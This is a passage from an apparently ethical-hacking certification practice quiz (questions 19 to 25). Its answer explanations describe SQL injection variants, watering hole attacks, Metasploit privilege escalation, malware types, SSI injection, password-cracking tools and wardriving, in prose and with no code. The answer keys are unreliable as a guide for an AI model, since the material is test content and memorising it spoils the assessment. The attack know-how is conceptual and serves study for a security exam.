https://en.wikipedia.org/wiki/SQL_injection Blind SQL injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack has traditionally been considered time-intensive because a new statement needed to be crafted for each bit recovered and depending on its structure, the attack may consist of many unsuccessful requests. Recent advancements have allowed each request to recover multiple bits, with no unsuccessful requests, allowing for more consistent and efficient extraction. Incorrect answers: Union-based SQLi Union-based SQLi is an in-band SQL injection technique that leverages the UNION SQL operator to combine the results of two or more SELECT statements into a single result which is then returned as part of the HTTP response. Out-of-band SQLi Out-of-band SQL injection is not very common, mostly because it depends on features being enabled on the database server being used by the web application. Out-of-band SQL injection occurs when an attacker is unable to use the same channel to launch the attack and gather results. Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable (making an inferential time-based attack unreliable). Out-of-band SQLi techniques would rely on the database servers ability to make DNS or HTTP requests to deliver data to an attacker. Such is the case with Microsoft SQL Servers xp_dirtree command, which can be used to make DNS requests to a server an attacker controls; as well as Oracle Databases UTL_HTTP package, which can be used to send HTTP requests from SQL and PL/SQL to a server an attacker controls. Error-based SQLi Error-based SQL injections are exploited by triggering errors in the database when invalid inputs are passed to it. The error messages can be used to return the full query results or gain information on how to restructure the query for further exploitation.
Question 19 of 65
19. Question
You are investigating to determine the reasons for compromising the computers of your company‘s employees. You will find out that the machines were infected through sites that employees often visit. When an employee opens a site, there is a redirect from a web page, and malware downloads to the machine. Which of the following attacks did the attacker perform on your company‘s employees?
Correct
https://en.wikipedia.org/wiki/Watering_hole_attack The watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware. Eventually, some members of the targeted group will become infected. Hacks looking for specific information may only attack users coming from a specific IP address. This also makes the hacks harder to detect and research. The name is derived from predators in the natural world, who wait for an opportunity to attack their prey near watering holes. Incorrect answers: DNS rebinding https://en.wikipedia.org/wiki/DNS_rebinding DNS rebinding is a method of manipulating resolution of domain names that is commonly used as a form of computer attack. In this attack, a malicious web page causes visitors to run a client-side script that attacks machines elsewhere on the network. In theory, the same-origin policy prevents this from happening: client-side scripts are only allowed to access content on the same host that served the script. Comparing domain names is an essential part of enforcing this policy, so DNS rebinding circumvents this protection by abusing the Domain Name System (DNS). This attack can be used to breach a private network by causing the victim‘s web browser to access computers at private IP addresses and return the results to the attacker. It can also be employed to use the victim machine for spamming, distributed denial-of-service attacks, or other malicious activities. MarioNet https://hub.packtpub.com/marionet-a-browser-based-attack-that-allows-hackers-to-run-malicious-code-even-if-users-exit-a-web-page/ MarioNet allows attackers to place malicious code on high-traffic websites for a short period of time. This allows the attackers to gain a huge user base, remove the malicious code, but continue to control the infected browsers from another central server. MarioNet allows hackers to assemble giant botnets from users browsers. The researchers state that these bots can be used for in-browser crypto-mining (crypto jacking), DDoS attacks, malicious files hosting/sharing, distributed password cracking, creating proxy networks, advertising click-fraud, and traffic stats boosting. Clickjacking https://en.wikipedia.org/wiki/Clickjacking Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages. Clickjacking is an instance of the confused deputy problem, wherein a computer is tricked into misusing its authority.
Incorrect
https://en.wikipedia.org/wiki/Watering_hole_attack The watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware. Eventually, some members of the targeted group will become infected. Hacks looking for specific information may only attack users coming from a specific IP address. This also makes the hacks harder to detect and research. The name is derived from predators in the natural world, who wait for an opportunity to attack their prey near watering holes. Incorrect answers: DNS rebinding https://en.wikipedia.org/wiki/DNS_rebinding DNS rebinding is a method of manipulating resolution of domain names that is commonly used as a form of computer attack. In this attack, a malicious web page causes visitors to run a client-side script that attacks machines elsewhere on the network. In theory, the same-origin policy prevents this from happening: client-side scripts are only allowed to access content on the same host that served the script. Comparing domain names is an essential part of enforcing this policy, so DNS rebinding circumvents this protection by abusing the Domain Name System (DNS). This attack can be used to breach a private network by causing the victim‘s web browser to access computers at private IP addresses and return the results to the attacker. It can also be employed to use the victim machine for spamming, distributed denial-of-service attacks, or other malicious activities. MarioNet https://hub.packtpub.com/marionet-a-browser-based-attack-that-allows-hackers-to-run-malicious-code-even-if-users-exit-a-web-page/ MarioNet allows attackers to place malicious code on high-traffic websites for a short period of time. This allows the attackers to gain a huge user base, remove the malicious code, but continue to control the infected browsers from another central server. MarioNet allows hackers to assemble giant botnets from users browsers. The researchers state that these bots can be used for in-browser crypto-mining (crypto jacking), DDoS attacks, malicious files hosting/sharing, distributed password cracking, creating proxy networks, advertising click-fraud, and traffic stats boosting. Clickjacking https://en.wikipedia.org/wiki/Clickjacking Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages. Clickjacking is an instance of the confused deputy problem, wherein a computer is tricked into misusing its authority.
Unattempted
https://en.wikipedia.org/wiki/Watering_hole_attack The watering hole is a computer attack strategy in which an attacker guesses or observes which websites an organization often uses and infects one or more of them with malware. Eventually, some members of the targeted group will become infected. Hacks looking for specific information may only attack users coming from a specific IP address. This also makes the hacks harder to detect and research. The name is derived from predators in the natural world, who wait for an opportunity to attack their prey near watering holes. Incorrect answers: DNS rebinding https://en.wikipedia.org/wiki/DNS_rebinding DNS rebinding is a method of manipulating resolution of domain names that is commonly used as a form of computer attack. In this attack, a malicious web page causes visitors to run a client-side script that attacks machines elsewhere on the network. In theory, the same-origin policy prevents this from happening: client-side scripts are only allowed to access content on the same host that served the script. Comparing domain names is an essential part of enforcing this policy, so DNS rebinding circumvents this protection by abusing the Domain Name System (DNS). This attack can be used to breach a private network by causing the victim‘s web browser to access computers at private IP addresses and return the results to the attacker. It can also be employed to use the victim machine for spamming, distributed denial-of-service attacks, or other malicious activities. MarioNet https://hub.packtpub.com/marionet-a-browser-based-attack-that-allows-hackers-to-run-malicious-code-even-if-users-exit-a-web-page/ MarioNet allows attackers to place malicious code on high-traffic websites for a short period of time. This allows the attackers to gain a huge user base, remove the malicious code, but continue to control the infected browsers from another central server. MarioNet allows hackers to assemble giant botnets from users browsers. The researchers state that these bots can be used for in-browser crypto-mining (crypto jacking), DDoS attacks, malicious files hosting/sharing, distributed password cracking, creating proxy networks, advertising click-fraud, and traffic stats boosting. Clickjacking https://en.wikipedia.org/wiki/Clickjacking Clickjacking is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages. Clickjacking is an instance of the confused deputy problem, wherein a computer is tricked into misusing its authority.
Question 20 of 65
20. Question
Which of the following is a Metasploit post-exploitation module that is used to escalate privileges on systems?
Correct
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate privileges. At the link above, you can see an example of using getsystem to escalate privileges.
Incorrect
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate privileges. At the link above, you can see an example of using getsystem to escalate privileges.
Unattempted
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ Metasploit has a Meterpreter script, getsystem, that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. There are also various other (local) exploits that can be used to also escalate privileges. At the link above, you can see an example of using getsystem to escalate privileges.
Question 21 of 65
21. Question
Which of the following is a type of malware that spreads from one system to another or from one network to another and causes similar types of damage as viruses to do to the infected system?
Correct
https://en.wikipedia.org/wiki/Computer_worm A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security failures on the target computer to access it. It will use this machine as a host to scan and infect other computers. When these new worm-invaded computers are controlled, the worm will continue to scan and infect other computers using these computers as hosts, and this behaviour will continue. Computer worms use recursive methods to copy themselves without host programs and distribute themselves based on the law of exponential growth, thus controlling and infecting more and more computers in a short time. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer. Incorrect answers: Rootkit https://en.wikipedia.org/wiki/Rootkit A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software. The term rootkit is a compound of “root“ (the traditional name of the privileged account on Unix-like operating systems) and the word “kit“ (which refers to the software components that implement the tool). The term “rootkit“ has negative connotations through its association with malware. Rootkit installation can be automated, or an attacker can install it after having obtained root or Administrator access. Obtaining this access is a result of direct attack on a system, i.e. exploiting a known vulnerability (such as privilege escalation) or a password (obtained by cracking or social engineering tactics like “phishing“). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. Full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent it. Adware https://en.wikipedia.org/wiki/Adware Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one is for the display of the advertisement and another on a “pay-per-click“ basis, if the user clicks on the advertisement. Some advertisements also act as spyware, collecting and reporting data about the user, to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, full screen, a video, pop-up ad or in some other form. All forms of advertising carry health, ethical, privacy and security risks for users. Trojan https://en.wikipedia.org/wiki/Trojan_horse_(computing) A Trojan horse (or simply trojan) is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an email attachment disguised to appear not suspicious, (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a trojan.
Incorrect
https://en.wikipedia.org/wiki/Computer_worm A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security failures on the target computer to access it. It will use this machine as a host to scan and infect other computers. When these new worm-invaded computers are controlled, the worm will continue to scan and infect other computers using these computers as hosts, and this behaviour will continue. Computer worms use recursive methods to copy themselves without host programs and distribute themselves based on the law of exponential growth, thus controlling and infecting more and more computers in a short time. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer. Incorrect answers: Rootkit https://en.wikipedia.org/wiki/Rootkit A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software. The term rootkit is a compound of “root“ (the traditional name of the privileged account on Unix-like operating systems) and the word “kit“ (which refers to the software components that implement the tool). The term “rootkit“ has negative connotations through its association with malware. Rootkit installation can be automated, or an attacker can install it after having obtained root or Administrator access. Obtaining this access is a result of direct attack on a system, i.e. exploiting a known vulnerability (such as privilege escalation) or a password (obtained by cracking or social engineering tactics like “phishing“). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. Full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent it. Adware https://en.wikipedia.org/wiki/Adware Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one is for the display of the advertisement and another on a “pay-per-click“ basis, if the user clicks on the advertisement. Some advertisements also act as spyware, collecting and reporting data about the user, to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, full screen, a video, pop-up ad or in some other form. All forms of advertising carry health, ethical, privacy and security risks for users. Trojan https://en.wikipedia.org/wiki/Trojan_horse_(computing) A Trojan horse (or simply trojan) is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an email attachment disguised to appear not suspicious, (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a trojan.
Unattempted
https://en.wikipedia.org/wiki/Computer_worm A computer worm is a standalone malware computer program that replicates itself in order to spread to other computers. It often uses a computer network to spread itself, relying on security failures on the target computer to access it. It will use this machine as a host to scan and infect other computers. When these new worm-invaded computers are controlled, the worm will continue to scan and infect other computers using these computers as hosts, and this behaviour will continue. Computer worms use recursive methods to copy themselves without host programs and distribute themselves based on the law of exponential growth, thus controlling and infecting more and more computers in a short time. Worms almost always cause at least some harm to the network, even if only by consuming bandwidth, whereas viruses almost always corrupt or modify files on a targeted computer. Incorrect answers: Rootkit https://en.wikipedia.org/wiki/Rootkit A rootkit is a collection of computer software, typically malicious, designed to enable access to a computer or an area of its software that is not otherwise allowed (for example, to an unauthorized user) and often masks its existence or the existence of other software. The term rootkit is a compound of “root“ (the traditional name of the privileged account on Unix-like operating systems) and the word “kit“ (which refers to the software components that implement the tool). The term “rootkit“ has negative connotations through its association with malware. Rootkit installation can be automated, or an attacker can install it after having obtained root or Administrator access. Obtaining this access is a result of direct attack on a system, i.e. exploiting a known vulnerability (such as privilege escalation) or a password (obtained by cracking or social engineering tactics like “phishing“). Once installed, it becomes possible to hide the intrusion as well as to maintain privileged access. Full control over a system means that existing software can be modified, including software that might otherwise be used to detect or circumvent it. Adware https://en.wikipedia.org/wiki/Adware Adware, often called advertising-supported software by its developers, is software that generates revenue for its developer by automatically generating online advertisements in the user interface of the software or on a screen presented to the user during the installation process. The software may generate two types of revenue: one is for the display of the advertisement and another on a “pay-per-click“ basis, if the user clicks on the advertisement. Some advertisements also act as spyware, collecting and reporting data about the user, to be sold or used for targeted advertising or user profiling. The software may implement advertisements in a variety of ways, including a static box display, a banner display, full screen, a video, pop-up ad or in some other form. All forms of advertising carry health, ethical, privacy and security risks for users. Trojan https://en.wikipedia.org/wiki/Trojan_horse_(computing) A Trojan horse (or simply trojan) is any malware that misleads users of its true intent. The term is derived from the Ancient Greek story of the deceptive Trojan Horse that led to the fall of the city of Troy. Trojans are generally spread by some form of social engineering, for example where a user is duped into executing an email attachment disguised to appear not suspicious, (e.g., a routine form to be filled in), or by clicking on some fake advertisement on social media or anywhere else. Although their payload can be anything, many modern forms act as a backdoor, contacting a controller which can then have unauthorized access to the affected computer. Ransomware attacks are often carried out using a trojan.
Question 22 of 65
22. Question
The cyber kill chain is essentially a cybersecurity model created by Lockheed Martin that traces the stages of a cyber-attack, identifies vulnerabilities, and helps security teams to stop the attacks at every stage of the chain. At what stage does the intruder transmit the malware via a phishing email or another medium?
Correct
https://en.wikipedia.org/wiki/Kill_chain The cyber kill chain consists of 7 distinct steps: 1. Reconnaissance The attacker collects data about the target and the tactics for the attack. This includes harvesting email addresses and gathering other information. 2. Weaponization Attackers develop malware by leveraging security vulnerabilities. Attackers engineer malware based on their needs and the intention of the attack. This process also involves attackers trying to reduce the chances of getting detected by the security solutions that the organization has in place. 3. Delivery The attacker delivers the weaponized malware via a phishing email or some other medium. The most common delivery vectors for weaponized payloads include websites, removable disks, and emails. This is the most important stage where the attack can be stopped by the security teams. 4. Exploitation The malicious code is delivered into the organizations system. The perimeter is breached here. And the attackers get the opportunity to exploit the organizations systems by installing tools, running scripts, and modifying security certificates. 5. Installation A backdoor or remote access trojan is installed by the malware that provides access to the intruder. This is also another important stage where the attack can be stopped using systems such as HIPS (Host-based Intrusion Prevention System). 6. Command and Control The attacker gains control over the organizations systems and network. Attackers gain access to privileged accounts and attempt brute force attacks, search for credentials, and change permissions to take over the control. 7. Actions on Objective The attacker finally extracts the data from the system. The objective involves gathering, encrypting, and extracting confidential information from the organizations environment.
Incorrect
https://en.wikipedia.org/wiki/Kill_chain The cyber kill chain consists of 7 distinct steps: 1. Reconnaissance The attacker collects data about the target and the tactics for the attack. This includes harvesting email addresses and gathering other information. 2. Weaponization Attackers develop malware by leveraging security vulnerabilities. Attackers engineer malware based on their needs and the intention of the attack. This process also involves attackers trying to reduce the chances of getting detected by the security solutions that the organization has in place. 3. Delivery The attacker delivers the weaponized malware via a phishing email or some other medium. The most common delivery vectors for weaponized payloads include websites, removable disks, and emails. This is the most important stage where the attack can be stopped by the security teams. 4. Exploitation The malicious code is delivered into the organizations system. The perimeter is breached here. And the attackers get the opportunity to exploit the organizations systems by installing tools, running scripts, and modifying security certificates. 5. Installation A backdoor or remote access trojan is installed by the malware that provides access to the intruder. This is also another important stage where the attack can be stopped using systems such as HIPS (Host-based Intrusion Prevention System). 6. Command and Control The attacker gains control over the organizations systems and network. Attackers gain access to privileged accounts and attempt brute force attacks, search for credentials, and change permissions to take over the control. 7. Actions on Objective The attacker finally extracts the data from the system. The objective involves gathering, encrypting, and extracting confidential information from the organizations environment.
Unattempted
https://en.wikipedia.org/wiki/Kill_chain The cyber kill chain consists of 7 distinct steps: 1. Reconnaissance The attacker collects data about the target and the tactics for the attack. This includes harvesting email addresses and gathering other information. 2. Weaponization Attackers develop malware by leveraging security vulnerabilities. Attackers engineer malware based on their needs and the intention of the attack. This process also involves attackers trying to reduce the chances of getting detected by the security solutions that the organization has in place. 3. Delivery The attacker delivers the weaponized malware via a phishing email or some other medium. The most common delivery vectors for weaponized payloads include websites, removable disks, and emails. This is the most important stage where the attack can be stopped by the security teams. 4. Exploitation The malicious code is delivered into the organizations system. The perimeter is breached here. And the attackers get the opportunity to exploit the organizations systems by installing tools, running scripts, and modifying security certificates. 5. Installation A backdoor or remote access trojan is installed by the malware that provides access to the intruder. This is also another important stage where the attack can be stopped using systems such as HIPS (Host-based Intrusion Prevention System). 6. Command and Control The attacker gains control over the organizations systems and network. Attackers gain access to privileged accounts and attempt brute force attacks, search for credentials, and change permissions to take over the control. 7. Actions on Objective The attacker finally extracts the data from the system. The objective involves gathering, encrypting, and extracting confidential information from the organizations environment.
Question 23 of 65
23. Question
Enabling SSI directives allows developers to add dynamic code snippets to static HTML pages without using full-fledged client or server languages. However, suppose the server is incorrectly configured (for example, allowing the exec directive) or the data is not strictly verified. In that case, an attacker can change or enter directives to perform malicious actions. What kind of known attack are we talking about?
Correct
https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. NOTE: All options are associated with injections. You just need to choose the right technology.
Incorrect
https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. NOTE: All options are associated with injections. You just need to choose the right technology.
Unattempted
https://owasp.org/www-community/attacks/Server-Side_Includes_(SSI)_Injection SSIs are directives present on Web applications used to feed an HTML page with dynamic contents. They are similar to CGIs, except that SSIs are used to execute some actions before the current page is loaded or while the page is being visualized. In order to do so, the web server analyzes SSI before supplying the page to the user. The Server-Side Includes attack allows the exploitation of a web application by injecting scripts in HTML pages or executing arbitrary codes remotely. It can be exploited through manipulation of SSI in use in the application or force its use through user input fields. NOTE: All options are associated with injections. You just need to choose the right technology.
Question 24 of 65
24. Question
Passwords are rarely stored in plain text, most often, one-way conversion (hashing) is performed to protect them from unauthorized access. However, there are some attacks and tools to crack the hash. Look at the following tools and select the one that can NOT be used for this.
Correct
https://en.wikipedia.org/wiki/Password_cracking Most systems dont store passwords on them. Instead they store hashes of passwords and when authentication takes place, the password is hashes and if the hashes match authentication is successful. Different systems store password hashes in different ways depending on the encryption used. Password hash cracking usually consists of taking a wordlist, hashing each word and comparing it against the hash youre trying to crack. This is a variation of a dictionary attack because wordlists often are composed of not just dictionary words but also passwords from public password dumps. This type of cracking becomes difficult when hashes are salted). https://en.wikipedia.org/wiki/Netcat Netcat is a utility capable of establishing a TCP or UDP connection between two computers, meaning it can write and read through an open port. With the help of the program, files can be transferred and commands can be executed in some instances. Incorrect answers: Hashcat https://hashcat.net/ Hackers use Hashcat to automate attacks against passwords and other shared secrets. It gives the user the ability to brute-force credential stores using known hashes, to conduct dictionary attacks and rainbow tables, and to reverse engineer readable information on user behavior into hashed-password combination attacks. John the Ripper https://www.openwall.com/john/ John the Ripper is an offline password cracker. In other words, it tries to find passwords from captured files without having to interact with the target. By doing this, it does not generate suspicious traffic since the process is generally performed locally, on the attackers machine. Although its primarily used to crack password hashes, John can also be used to crack protected archive files, encrypted private keys, and many more. Ophcrack https://ophcrack.sourceforge.io/ Ophcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored rainbow tables.
Incorrect
https://en.wikipedia.org/wiki/Password_cracking Most systems dont store passwords on them. Instead they store hashes of passwords and when authentication takes place, the password is hashes and if the hashes match authentication is successful. Different systems store password hashes in different ways depending on the encryption used. Password hash cracking usually consists of taking a wordlist, hashing each word and comparing it against the hash youre trying to crack. This is a variation of a dictionary attack because wordlists often are composed of not just dictionary words but also passwords from public password dumps. This type of cracking becomes difficult when hashes are salted). https://en.wikipedia.org/wiki/Netcat Netcat is a utility capable of establishing a TCP or UDP connection between two computers, meaning it can write and read through an open port. With the help of the program, files can be transferred and commands can be executed in some instances. Incorrect answers: Hashcat https://hashcat.net/ Hackers use Hashcat to automate attacks against passwords and other shared secrets. It gives the user the ability to brute-force credential stores using known hashes, to conduct dictionary attacks and rainbow tables, and to reverse engineer readable information on user behavior into hashed-password combination attacks. John the Ripper https://www.openwall.com/john/ John the Ripper is an offline password cracker. In other words, it tries to find passwords from captured files without having to interact with the target. By doing this, it does not generate suspicious traffic since the process is generally performed locally, on the attackers machine. Although its primarily used to crack password hashes, John can also be used to crack protected archive files, encrypted private keys, and many more. Ophcrack https://ophcrack.sourceforge.io/ Ophcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored rainbow tables.
Unattempted
https://en.wikipedia.org/wiki/Password_cracking Most systems dont store passwords on them. Instead they store hashes of passwords and when authentication takes place, the password is hashes and if the hashes match authentication is successful. Different systems store password hashes in different ways depending on the encryption used. Password hash cracking usually consists of taking a wordlist, hashing each word and comparing it against the hash youre trying to crack. This is a variation of a dictionary attack because wordlists often are composed of not just dictionary words but also passwords from public password dumps. This type of cracking becomes difficult when hashes are salted). https://en.wikipedia.org/wiki/Netcat Netcat is a utility capable of establishing a TCP or UDP connection between two computers, meaning it can write and read through an open port. With the help of the program, files can be transferred and commands can be executed in some instances. Incorrect answers: Hashcat https://hashcat.net/ Hackers use Hashcat to automate attacks against passwords and other shared secrets. It gives the user the ability to brute-force credential stores using known hashes, to conduct dictionary attacks and rainbow tables, and to reverse engineer readable information on user behavior into hashed-password combination attacks. John the Ripper https://www.openwall.com/john/ John the Ripper is an offline password cracker. In other words, it tries to find passwords from captured files without having to interact with the target. By doing this, it does not generate suspicious traffic since the process is generally performed locally, on the attackers machine. Although its primarily used to crack password hashes, John can also be used to crack protected archive files, encrypted private keys, and many more. Ophcrack https://ophcrack.sourceforge.io/ Ophcrack is a password cracker based on rainbow tables, a method that makes it possible to speed up the cracking process by using the result of calculations done in advance and stored rainbow tables.
Question 25 of 65
25. Question
What is the name of the technique in which attackers move around the territory in a moving vehicle and use special equipment and software to search for vulnerable and accessible WiFi networks?
Correct
https://us-cert.cisa.gov/ncas/tips/ST05-003 Mobile device + Wireless network card + antenna + GPS access + Special software. This is all that needs to find if not all, most of the vulnerable and accessible wireless Internet networks in your area or even city in just a few hours. Does it sound like a plot from a movie? But this is reality. Wardriving occurs when someone uses software and hardware to locate unsecured wireless networks and potentially access them. Software applications are needed to figure out passwords and decrypt networks. Hardware includes a mobile device such as a wireless laptop, a GPS system, and a wireless network. Wardrivers travel around looking for Wi-Fi signals, plotting the Wi-Fi access points on a map also called access point mapping and gathering data on those networks. Wardrivers stay on the move, usually in vehicles, to find those Wi-Fi networks along their route. Variations of wardriving include warbiking, warcycling, warwalking, warjogging, warrailing, wartraining, and warkitting. The legality of wardriving can be confusing. Laws dont expressly prohibit or permit wardriving, but the act may have legal implications under certain jurisdictions and circumstances. For instance, in the United States, it isnt illegal to gather data on wireless networks. Wardriving can have peaceful purposes like data collection and computer-generated mapping. But exploiting wardriving could be problematic if a wardriver accesses a private network. Hacking into networks that arent yours especially when accessing another persons data and with malintent could be considered a network attack and deemed criminal activity. Wardriving can be dangerous on a larger scale when the hack involves corporate networks. Incorrect answers: Spectrum analysis https://en.wikipedia.org/wiki/Spectral_density_estimation Spectrum analysis helps you detect various types of interference, non Wi-Fi interference, or interference that can also be transient in nature that decreases the performance of your wireless network. Spectrum analysis enables you to visualize the radio frequencies operating in your area and determine the strength of the detected signals. Wireless sniffing https://www.cisco.com/c/en/us/support/docs/wireless-mobility/80211/200527-Fundamentals-of-802-11-Wireless-Sniffing.html Wireless sniffing is the practice of eavesdropping on communications within a wireless network by using special software or hardware tools. Sniffing is more intrusive than wireless stumbling, which is looking for the presence of wireless networks. The motives behind wireless sniffing can range from troubleshooting to a malicious attack against a network or individual. Rogue access point https://en.wikipedia.org/wiki/Rogue_access_point A rogue access point (rogue AP) is any wireless access point that has been installed on a network‘s wired infrastructure without the consent of the network‘s administrator or owner, thereby providing unauthorized wireless access to the network‘s wired infrastructure. Most of the time, rogue APs are set up by employees who want wireless access when none is available.
Incorrect
https://us-cert.cisa.gov/ncas/tips/ST05-003 Mobile device + Wireless network card + antenna + GPS access + Special software. This is all that needs to find if not all, most of the vulnerable and accessible wireless Internet networks in your area or even city in just a few hours. Does it sound like a plot from a movie? But this is reality. Wardriving occurs when someone uses software and hardware to locate unsecured wireless networks and potentially access them. Software applications are needed to figure out passwords and decrypt networks. Hardware includes a mobile device such as a wireless laptop, a GPS system, and a wireless network. Wardrivers travel around looking for Wi-Fi signals, plotting the Wi-Fi access points on a map also called access point mapping and gathering data on those networks. Wardrivers stay on the move, usually in vehicles, to find those Wi-Fi networks along their route. Variations of wardriving include warbiking, warcycling, warwalking, warjogging, warrailing, wartraining, and warkitting. The legality of wardriving can be confusing. Laws dont expressly prohibit or permit wardriving, but the act may have legal implications under certain jurisdictions and circumstances. For instance, in the United States, it isnt illegal to gather data on wireless networks. Wardriving can have peaceful purposes like data collection and computer-generated mapping. But exploiting wardriving could be problematic if a wardriver accesses a private network. Hacking into networks that arent yours especially when accessing another persons data and with malintent could be considered a network attack and deemed criminal activity. Wardriving can be dangerous on a larger scale when the hack involves corporate networks. Incorrect answers: Spectrum analysis https://en.wikipedia.org/wiki/Spectral_density_estimation Spectrum analysis helps you detect various types of interference, non Wi-Fi interference, or interference that can also be transient in nature that decreases the performance of your wireless network. Spectrum analysis enables you to visualize the radio frequencies operating in your area and determine the strength of the detected signals. Wireless sniffing https://www.cisco.com/c/en/us/support/docs/wireless-mobility/80211/200527-Fundamentals-of-802-11-Wireless-Sniffing.html Wireless sniffing is the practice of eavesdropping on communications within a wireless network by using special software or hardware tools. Sniffing is more intrusive than wireless stumbling, which is looking for the presence of wireless networks. The motives behind wireless sniffing can range from troubleshooting to a malicious attack against a network or individual. Rogue access point https://en.wikipedia.org/wiki/Rogue_access_point A rogue access point (rogue AP) is any wireless access point that has been installed on a network‘s wired infrastructure without the consent of the network‘s administrator or owner, thereby providing unauthorized wireless access to the network‘s wired infrastructure. Most of the time, rogue APs are set up by employees who want wireless access when none is available.
Unattempted
https://us-cert.cisa.gov/ncas/tips/ST05-003 Mobile device + Wireless network card + antenna + GPS access + Special software. This is all that needs to find if not all, most of the vulnerable and accessible wireless Internet networks in your area or even city in just a few hours. Does it sound like a plot from a movie? But this is reality. Wardriving occurs when someone uses software and hardware to locate unsecured wireless networks and potentially access them. Software applications are needed to figure out passwords and decrypt networks. Hardware includes a mobile device such as a wireless laptop, a GPS system, and a wireless network. Wardrivers travel around looking for Wi-Fi signals, plotting the Wi-Fi access points on a map also called access point mapping and gathering data on those networks. Wardrivers stay on the move, usually in vehicles, to find those Wi-Fi networks along their route. Variations of wardriving include warbiking, warcycling, warwalking, warjogging, warrailing, wartraining, and warkitting. The legality of wardriving can be confusing. Laws dont expressly prohibit or permit wardriving, but the act may have legal implications under certain jurisdictions and circumstances. For instance, in the United States, it isnt illegal to gather data on wireless networks. Wardriving can have peaceful purposes like data collection and computer-generated mapping. But exploiting wardriving could be problematic if a wardriver accesses a private network. Hacking into networks that arent yours especially when accessing another persons data and with malintent could be considered a network attack and deemed criminal activity. Wardriving can be dangerous on a larger scale when the hack involves corporate networks. Incorrect answers: Spectrum analysis https://en.wikipedia.org/wiki/Spectral_density_estimation Spectrum analysis helps you detect various types of interference, non Wi-Fi interference, or interference that can also be transient in nature that decreases the performance of your wireless network. Spectrum analysis enables you to visualize the radio frequencies operating in your area and determine the strength of the detected signals. Wireless sniffing https://www.cisco.com/c/en/us/support/docs/wireless-mobility/80211/200527-Fundamentals-of-802-11-Wireless-Sniffing.html Wireless sniffing is the practice of eavesdropping on communications within a wireless network by using special software or hardware tools. Sniffing is more intrusive than wireless stumbling, which is looking for the presence of wireless networks. The motives behind wireless sniffing can range from troubleshooting to a malicious attack against a network or individual. Rogue access point https://en.wikipedia.org/wiki/Rogue_access_point A rogue access point (rogue AP) is any wireless access point that has been installed on a network‘s wired infrastructure without the consent 